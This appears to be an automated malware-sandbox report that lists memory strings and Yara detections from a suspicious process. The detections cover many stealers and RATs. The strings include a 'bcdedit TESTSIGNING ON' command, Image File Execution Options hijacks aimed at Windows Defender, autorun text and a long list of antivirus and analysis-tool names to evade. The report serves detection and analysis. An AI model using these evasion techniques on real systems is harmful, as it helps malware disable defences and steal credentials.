Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\cnshelper.ch.1
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\cnshelper.ch.1c%
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\insiii.brins.1c&
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\installer.brins
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\installer.brinsc&
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\autolive.live.1

Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	Binary or memory string: MSVBVM60MSVBVM50MSVBVM events are artifactsRICHEDIT50Wmyself.dll%08x0x%xException in the timer procC:\Wallpaper1.bmp2 :\|:1 11EditButtonVDLL:HMValidateHandleCalledC:\C:\WinSta0SkypeControlAPISkypeControlAPIAttachSkypeControlAPIDiscoverGDI32.DLLArmadillo_MutexGDI32.DLLChildControlStaticListBoxScrollBarComboBox#32770DialogPEEMU:VirTool:Win32/Obfuscator_Upatreriched20.dllRichEditANSIWndProcRichEditMDICLIENTMDICLIENTlistboxWINSTA0WinSta0Winsta0Winsta000000409CursorInternet Explorer_ServerTibiaClientTibia#32769ATL:007BF380YTopWindowYahooBuddyMainYahoo! MessengerWMPlayerAppPlaying MP3NotepadMy saved passwords - NotepadProgram ManagerShell_TrayWndtooltips_class32CityBank log-inIEFrameBank of America log-infalsetrue_Dummy_0x6A__Dummy_0x69__Dummy_0x68__Dummy_0x67__Dummy_0x66__Dummy_0x65__Dummy_0x64__Dummy_0x63__Dummy_0x62__Dummy_0x61__Dummy_0x60__Dummy_0x5F__Dummy_0x5E__Dummy_0x5D__Dummy_0x5C__Dummy_0x5B__Dummy_0x5A__Dummy_0x59__Dummy_0x58__Dummy_0x57__Dummy_0x56__Dummy_0x55__Dummy_0x54__Dummy_0x53__Dummy_0x52__Dummy_0x51__Dummy_0x50__Dummy_0x4F__Dummy_0x4E__Dummy_0x4D__Dummy_0x4C__Dummy_0x4B__Dummy_0x4A__Dummy_0x49__Dummy_0x48__Dummy_0x47__Dummy_0x46__Dummy_0x45__Dummy_0x44__Dummy_0x43__Dummy_0x42__Dummy_0x41__Dummy_0x40__Dummy_0x3F__Dummy_0x3E__Dummy_0x3D__Dummy_0x3C__Dummy_0x3B__Dummy_0x3A__Dummy_0x39__Dummy_0x38__Dummy_0x37__Dummy_0x36__DummyAA__DummyZ__DummyW__DummyV__DummyU__DummyT__DummyS__DummyR__DummyQ__DummyP__DummyO__DummyN__DummyM__DummyL__DummyK__DummyJ__DummyI__DummyH__DummyG__DummyF__DummyE__DummyD__DummyC__DummyB__DummyA__Dummy9__Dummy_x1c__Dummy7__Dummy6__Dummy5__Dummy4__Dummy3__Dummy2__Dummy_
Source: MpSigStub.exe, 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\progman.exeexe D
Source: FACTURA.exe, 00000001.00000000.2909753297.0000000000DD0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000017.00000002.7884746567.000001F548A60000.00000002.00020000.sdmp, MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: FACTURA.exe, 00000001.00000000.2909753297.0000000000DD0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000017.00000002.7884746567.000001F548A60000.00000002.00020000.sdmp, MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp	Binary or memory string: GetProgmanWindow
Source: FACTURA.exe, 00000001.00000000.2909753297.0000000000DD0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000017.00000002.7884746567.000001F548A60000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndx
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	Binary or memory string: %s\Rundll32.exe "%s\%s",DllCanUnloadNowShell_TrayWndSoftware\
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	Binary or memory string: ~SystemCache.batShell_TrayWnd
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	Binary or memory string: \Internet Explorer\Quick Launch\Shell_TrayWnd
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	Binary or memory string: Progman Folder*Administrative Tools
Source: FACTURA.exe, 00000001.00000000.2909753297.0000000000DD0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000017.00000002.7884746567.000001F548A60000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp	Binary or memory string: shell_traywnd%s\C:\WINDOWS\Sy
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	Binary or memory string: Explorer.exeShell_TrayWndGetProc
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp	Binary or memory string: shell_traywnd
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp	Binary or memory string: SetProgmanWindow
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp	Binary or memory string: shell_traywnd

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe

Code function: 35_2_00007FF67CD48ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

May enable test signing (to load unsigned drivers)

Show sources

Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	Memory string: bcdedit.exe -set TESTSIGNING ON
Source: MpSigStub.exe, 00000024.00000003.6275006647.0000019790C75000.00000004.00000001.sdmp	Memory string: bcdedit.exe -set TESTSIGNING ON

Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp

Binary or memory string: &S:(ML;;NRNWNX;;;LW)

Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: scanwscs.exe
Source: MpSigStub.exe, 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp	Binary or memory string: \avgupd.exe
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	Binary or memory string: Bsoftware\microsoft\windows\currentversion\app paths\wireshark.exe
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	Binary or memory string: procmon.exe
Source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp	Binary or memory string: tcpview.exe
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: \startup\360tray.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: fsgk32.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: bullguard.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: kav32.exe
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: sched.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: fsm32.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: ravmond.exe
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	Binary or memory string: \windows defender\msascui.exe
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	Binary or memory string: \msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	Binary or memory string: hijackthis.exe
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	Binary or memory string: fsav32.exe
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	Binary or memory string: FSMA32.EXE
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	Binary or memory string: [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	Binary or memory string: fsbl.exe
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: KVXP.kxp
Source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp	Binary or memory string: procdump.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: fpavserver.exe
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	Binary or memory string: kxetray.exe
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: \360tray.exe
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	Binary or memory string: \virus.exe
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: KAVPFW.EXE
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: ESET\nod32.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: sbamtray.exe
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: pctsGui.exe
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	Binary or memory string: 360tray.exe
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: 360Tray.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: superantispyware.exe
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	Binary or memory string: mcvsshld.exe
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	Binary or memory string: [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp	Binary or memory string: \windows defender\msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: op_mon.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: k7emlpxy.exe
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	Binary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: quhlpsvc.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: KvXP.kxp
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	Binary or memory string: msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: 360TraY.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: k7pssrvc.exe
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	Binary or memory string: *.csv.\|!\SBAMSvc.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: k7tsmngr.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: emlproxy.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: nod32.exe
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	Binary or memory string: kav.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: fprottray.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: clamtray.exe
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp	Binary or memory string: savservice.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: nod32krn.exe
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	Binary or memory string: avgupd.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: guardxservice.exe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	Binary or memory string: regshot.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: kavstart.exe
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: bdagent.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: k7fwsrvc.exe
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	Binary or memory string: \avp.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: KavPFW.EXE
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	Binary or memory string: \kav.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: MSMPENG.EXE
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: avkservice.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: virusutilities.exe
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	Binary or memory string: 0{645FF040-5081-101B-9F08-00AA002F954E}\kav32.exe
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	Binary or memory string: lordpe.exe
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: McAfee.com\VSO\Mcshield.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.manifest.\|!\SavService.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: autoruns.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: k7rtscan.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: SPIDERNT.EXE
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	Binary or memory string: mcagent.exe
Source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp	Binary or memory string: msascui.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: ICESWORD.EXE
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: avkproxy.exe
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	Binary or memory string: AVGcsrvx.exe
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	Binary or memory string: RC:\Program Files\Wireshark\wireshark.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: AVP.EXE
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	Binary or memory string: bdss.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: sbamsvc.exe
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	Binary or memory string: Vsserv.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: IceSword.exe
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: clamwin.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: kvxp.kxp
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	Binary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: fsma32.exe
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	Binary or memory string: MSASCui.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: acs.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: Ravmond.exe
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	Binary or memory string: avp.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: 360safe.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: Wireshark.exe
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp	Binary or memory string: 360Safe.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: KAV32.exe
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	Binary or memory string: c:\123.exe
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	Binary or memory string: \procdump.exe
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	Binary or memory string: *.jpg.\|!\SavService.exe
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	Binary or memory string: avgnt.exe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	Binary or memory string: \vipre business agent\sbamsvc.exe
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: a2guard.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: mbam.exe
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	Binary or memory string: FSMB32.EXE
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	Binary or memory string: (\avp.exe
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	Binary or memory string: ollydbg.exe
Source: MpSigStub.exe, 00000024.00000003.6340510692.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: Image File Execution Options\msmpeng.exeDebuggerImage File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: avktray.exe
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	Binary or memory string: Regshot.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: nod32kui.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: KPFW32.EXE
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	Binary or memory string: mcshield.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: icesword.exe
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	Binary or memory string: \App Paths\360Safe.exe
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	Binary or memory string: AVGcmgr.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: fsav.exe
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	Binary or memory string: delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp, mpam-fad3e9a8.exe	Binary or memory string: MsMpEng.exe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	Binary or memory string: "\vipre business agent\sbamsvc.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: onlinent.exe
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	Binary or memory string: \MsMpEng.exe
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	Binary or memory string: FSAV32.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: cmdagent.exe
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	Binary or memory string: avguard.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: fpwin.exe
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: zlclient.exe
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: avgtray.exe
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	Binary or memory string: McShield.exe
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp	Binary or memory string: RImage File Execution Options\MSMPENG.exe
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	Binary or memory string: TmPfw.exe
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	Binary or memory string: KVMonXP.kxp
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	Binary or memory string: regedit.com
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: procexp.exe
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	Binary or memory string: %installlocation%\msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: license.rtf.\|!\SavService.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: k7tsecurity.exe
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	Binary or memory string: /delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	Binary or memory string: Mcshield.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: regmon.exe

Stealing of Sensitive Information:

Yara detected LaZagne password dumper

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Neshta

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Discord Token Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected MailPassView

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Snake Keylogger

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Parallax RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Valak

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Mini RAT

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Koadic

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Telegram RAT

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Njrat

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Mimikatz

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
